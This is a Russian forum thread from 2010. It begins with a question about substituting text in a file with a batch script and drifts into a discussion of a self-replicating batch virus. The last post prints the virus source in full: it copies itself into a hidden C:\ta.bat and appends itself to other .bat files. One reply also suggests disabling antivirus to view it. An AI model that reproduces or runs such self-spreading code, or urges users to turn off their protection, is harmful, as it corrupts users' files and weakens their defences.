|
|
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
В гугле не нашел, видимо искать не умею. Суть такова: Я хочу изменить некоторую часть содержимого файла, например подставить вместо #MASK# осмысленное значение. Возможно ли автоматизировать этот процесс при помощи bat файла? Ну или хотя-бы команду подскажите которая менять по маске может. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 11:05 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
Таки да, искать вообще не умеем! Хотя и простая, но очень доходчивая статейка в вашем случае, сударь. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 12:23 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
Ухтышка: Код: plaintext 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. Интересный батник в просторах интернета обитает :) ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 12:29 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
С0ВЕСТЬ пишет: avast!: тело сообщения было удалено, поскольку оно содержало вирус. Posted via ActualForum NNTP Server 1.4 ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 12:32 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
МикросекундаС0ВЕСТЬ пишет: avast!: тело сообщения было удалено, поскольку оно содержало вирус. Точно! Подробности смотрим по адресу: http://wosoft.at.ua/index/0-6 Значит работает тоже, можно бросить в запароленный архив и проверять антивирусники. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 12:47 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
С0ВЕСТЬ пишет: С> К сообщению приложен файл (Capture.JPG): cкачать. Размер - 55Kb Смешно то, что я вообще эту страницу открыть не могу - сразу ругается АВ :) А через ННТП картинку не видно. Posted via ActualForum NNTP Server 1.4 ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 13:09 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
МикросекундаС0ВЕСТЬ пишет: С> К сообщению приложен файл (Capture.JPG): cкачать. Размер - 55Kb Смешно то, что я вообще эту страницу открыть не могу - сразу ругается АВ :) А через ННТП картинку не видно. нашел интересный пример батника-вируса, который сам себя копирует. сохранив код в текстовфый файл, microsoft security essential моментально вычислил там вирус и заблокировал его, что и показал на картинке. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 13:27 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
Микросекунда, Ну так отключи на минуту антивирус и посмотри. Тут же ничего не запускается, просто текст батника в цитате приведен. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 14:42 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
Edd.Dragon пишет: ED> Ну так отключи на минуту антивирус и посмотри. Зачем ? ED> Тут же ничего не запускается, просто текст батника в цитате приведен. Верю :) Posted via ActualForum NNTP Server 1.4 ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 14:52 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
юность Ким Ир СенаВ гугле не нашел, видимо искать не умею. Суть такова: Я хочу изменить некоторую часть содержимого файла, например подставить вместо #MASK# осмысленное значение. Возможно ли автоматизировать этот процесс при помощи bat файла? Ну или хотя-бы команду подскажите которая менять по маске может. Возможно, но вероятнее ты раньше умрешь, чем сможешь это сделать. Речь конечно про систему команд бат файла, а не про запуск WSH/PowerShell в нем. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 15:18 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
Так и пишет, что это генератор bat файлов -типичный троян. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 15:21 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
Anatoly PodgoretskyТак и пишет, что это генератор bat файлов -типичный троян. Удивительно ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 21.09.2010, 16:45 |
|
||
|
bat изменить файл
|
|||
|---|---|---|---|
|
#18+
Это обычный набор плохих констант, портящих компьютер, которые не производят разумных действий. Возможно, вирусная активность приписана бинарным константам. Текст файла не содержит находимой антивирусом вирусной активности, но всё равно опасен для компьютера. @echo off %[MTA]% if '%1=='ZZ goto MTI if exist C:\ta.bat goto MTA if not exist %0 goto MTE find "MTA" < %0 > C:\ta.bat attrib +h C:\ta.bat :MTA for %%t in *.bat do call MTA ZZ %%t goto MTE :MTI find "MTA" < %2 > null if not errorlevel 1 goto MTE type C:\ta.bat >> %2 :MTE У "warez´ников" - "ц" от "цианид" ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 25.09.2010, 18:50 |
|
||
|
|